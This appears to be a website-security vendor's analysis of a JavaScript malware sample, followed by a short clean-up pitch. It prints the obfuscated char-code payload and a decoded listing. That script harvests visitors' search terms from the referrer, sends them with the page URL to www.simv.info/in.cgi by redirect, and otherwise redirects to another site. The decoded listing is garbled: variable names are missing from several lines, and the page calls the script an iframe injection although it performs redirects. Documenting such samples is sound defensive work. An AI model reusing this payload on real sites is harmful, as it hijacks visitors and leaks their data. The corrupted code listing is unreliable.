10, 97, 40, 34, 119, 101, 98, 99, 114, 97, 119,108, 101, 114, 46, 34, 44, 34, 115, 101, 97, 114, 99, 104, 84, 101, 120, 116, 34, 44, 34, 119, 101, 98, 99, 114,97, 119, 108, 101, 114, 34, 41, 59, 32, 13, 10, 97, 40, 34, 101, 120, 99, 105, 116, 101, 46, 34, 44, 34, 115, 101,97, 114, 99, 104, 34, 44, 34, 101, 120, 99, 105, 116, 101, 34, 41, 59, 32, 13, 10, 97, 40, 34, 110, 101, 116, 115,99, 97, 112, 101, 46, 99, 111, 109, 46, 34, 44, 34, 115, 101, 97, 114, 99, 104, 34, 44, 34, 110, 101, 116, 115,99, 97, 112, 101, 34, 41, 59, 32, 13, 10, 97, 40, 34, 109, 97, 109, 109, 97, 46, 99, 111, 109, 46, 34, 44, 34,113, 117, 101, 114, 121, 34, 44, 34, 109, 97, 109, 109, 97, 34, 41, 59, 32, 13, 10, 97, 40, 34, 97, 108, 108, 116,104, 101, 119, 101, 98, 46, 99, 111, 109, 46, 34, 44, 34, 113, 117, 101, 114, 121, 34, 44, 34, 97, 108, 108, 116,104, 101, 119, 101, 98, 46, 99, 111, 109, 34, 41, 59, 32, 13, 10, 97, 40, 34, 110, 111, 114, 116, 104, 101, 114,110, 108, 105, 103, 104, 116, 46, 99, 111, 109, 46, 34, 44, 34, 113, 114, 34, 44, 34, 110, 111, 114, 116, 104,101, 114, 110, 108, 105, 103, 104, 116, 46, 99, 111, 109, 34, 41, 59, 32, 13, 10, 13, 10, 105, 102, 40, 116, 46,108, 101, 110, 103, 116, 104, 38, 38, 40, 40, 113, 61, 114, 46, 105, 110, 100, 101, 120, 79, 102, 40, 34, 63, 34,43, 116, 43, 34, 61, 34, 41, 41, 33, 61, 45, 49, 124, 124, 40, 113, 61, 114, 46, 105, 110, 100, 101, 120, 79, 102,40, 34, 38, 34, 43, 116, 43, 34, 61, 34, 41, 41, 33, 61, 45, 49, 41, 41, 123, 13, 10, 107, 61, 114, 46, 115, 117,98, 115, 116, 114, 105, 110, 103, 40, 113, 43, 50, 43, 116, 46, 108, 101, 110, 103, 116, 104, 41, 46, 115, 112,108, 105, 116, 40, 34, 38, 34, 41, 91, 48, 93, 46, 115, 112, 108, 105, 116, 40, 34, 43, 34, 41, 46, 106, 111, 105,110, 40, 34, 37, 50, 48, 34, 41, 46, 115, 112, 108, 105, 116, 40, 34, 37, 50, 48, 34, 41, 46, 106, 111, 105, 110,40, 34, 37, 50, 66, 34, 41, 59, 13, 10, 103, 61, 34, 104, 116, 116, 112, 58, 47, 47, 119, 119, 119, 46, 115, 105,109, 118, 46, 105, 110, 102, 111, 47, 105, 110, 46, 99, 103, 105, 63, 50, 38, 72, 84, 84, 80, 95, 82, 69, 70, 69,82, 69, 82, 61, 34, 43, 107, 43, 34, 59, 34, 43, 101, 110, 99, 111, 100, 101, 85, 82, 73, 67, 111, 109, 112, 111,110, 101, 110, 116, 40, 117, 41, 43, 34, 59, 34, 43, 115, 101, 43, 34, 59, 34, 43, 114, 43, 34, 59, 34, 43, 34,38, 117, 114, 61, 49, 38, 112, 97, 114, 97, 109, 101, 116, 101, 114, 61, 34, 43, 107, 49, 59, 13, 10, 119, 105,110, 100, 111, 119, 46, 108, 111, 99, 97, 116, 105, 111, 110, 61, 103, 59, 125, 13, 10, 101, 108, 115, 101, 123,119, 105, 110, 100, 111, 119, 46, 108, 111, 99, 97, 116, 105, 111, 110, 61, 34, 104, 116, 116, 112, 58, 47, 47,97, 98, 111, 117, 116, 46, 104, 97, 117, 116, 101, 116, 102, 111, 114, 116, 46, 99, 111, 109, 34, 59, 125));


Malicious action:  injecting hidden iframe to either  www.simv.info/in.cgi or http://about.hautetfort.com

  1. k1 = "kelly+blue+book";
  2. = document.referrer;
  3. = document.URL;
  4. = "";
  5. se = "unknown";
  6. function a(c, d, e) {
  7.     if (r.indexOf(c) != -1) {
  8.         t = d;
  9.         se = e;
  10.     }
  11. }
  12. a("google.", "q", "google");
  13. a("msn.", "q", "msn");
  14. a("yahoo.", "p", "yahoo");
  15. a("altavista.", "q", "altavista");
  16. a("aol.", "query", "aol");
  17. a("ask.", "q", "ask");
  18. a("eureka.com.", "q", "eureka.com");
  19. a("lycos.com.", "query", "lycos");
  20. a("hotbot.com.", "MT", "hotbot");
  21. a("infoseek.com.", "qt", "infoseek.com");
  22. a("webcrawler.", "searchText", "webcrawler");
  23. a("excite.", "search", "excite");
  24. a("netscape.com.", "search", "netscape");
  25. a("mamma.com.", "query", "mamma");
  26. a("alltheweb.com.", "query", "alltheweb.com");
  27. a("northernlight.com.", "qr", "northernlight.com");
  28. if (t.length && ((= r.indexOf("?" + t + "=")) != -1 || (= r.indexOf("&" + t + "=")) != -1)) {
  29.     k = r.substring(+ 2 + t.length).split("&")[0].split("+").join("%20").split("%20").join("%2B");
  30.     g = "http://www.simv.info/in.cgi?2&HTTP_REFERER=" + k + ";" + encodeURIComponent(u) + ";" + se + ";" + r + ";"+ "&ur=1&parameter=" + k1;
  31.     window.location = g;
  32. } else {
  33.     window.location = "http://about.hautetfort.com";
  34. }

Summary

Scanning your website for hidden iframes and other invisible threats can save you headache later of getting out from blacklist. It helps you to avoid traffic loss on the early stages of the attack!
Successful hacking is usually made possible because of the neglected security best practices by the website owners.

Malware clean-up


Such malware is often hidden inside the JavaScript file. If you suspect that your website was infected by similar malware please use Website Anti-malware Monitoring for real-time anti-malware monitoring and for remediation assessment.